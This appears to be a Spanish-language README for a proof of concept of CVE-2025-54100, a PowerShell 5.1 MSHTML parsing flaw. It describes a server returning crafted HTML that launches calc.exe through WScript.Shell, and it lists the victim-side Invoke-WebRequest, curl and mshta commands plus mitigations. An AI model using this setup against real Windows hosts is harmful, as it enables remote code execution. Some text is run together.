
CVE-2025-54100(Vulnerabilidad de ejecución remota de código en PowerShell)
Demuestra cómo CVE-2025-54100 provoca ejecución remota de código (RCE) en Windows PowerShell 5.1 mediante el análisis de HTML malicioso.
Tipo de vulnerabilidad: Riesgo de inyección de comandos cuando Invoke-WebRequest no utiliza el parámetro -UseBasicParsing
Gravedad: CVSS 7.8 (alta)
Causa raíz: El análisis de respuestas HTML basado en MSHTML permite la ejecución de scripts (como ActiveXObject) y se ejecuta en el contexto del llamador
Sistemas afectados:
CVE-2025-54100.py devuelve una carga útil HTML cuidadosamente diseñadaWScript.Shell / Shell.Applicationcalc.exepython3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
Inicie el servicio HTTP del PoC:
uvicorn app:app --host 0.0.0.0 --port 8888 --reload
En un host Windows vulnerable, no use -UseBasicParsing; ejecute los siguientes comandos:
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://192.168.26.16:8888"
# curl(PowerShell 中的别名)
curl http://192.168.26.16:8888
# mshta
mshta http://192.168.26.16:8888
Asegúrese de que el puerto coincida con la configuración del servidor. Si el sistema es vulnerable, el script incrustado se ejecutará a través del analizador MSHTML.
Nota: Algunos antivirus pueden bloquear este comportamiento, incluso cuando la vulnerabilidad de análisis sigue presente.
calc.exe:
Invoke-WebRequest sin usar -UseBasicParsingEste paso se utiliza para verificar el vector de ejecución. En escenarios de ataque reales, los atacantes podrían usar técnicas de ofuscación o evasión para sortear las restricciones de seguridad predeterminadas.

Microsoft corrigió esta vulnerabilidad en diciembre de 2025:
Instale las actualizaciones de seguridad de Windows de inmediato
Use siempre -UseBasicParsing para evitar el análisis de MSHTML:
Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
Migre a PowerShell 7+ (pwsh): PowerShell Core ya no depende de MSHTML para el análisis, lo que evita este problema a nivel de arquitectura.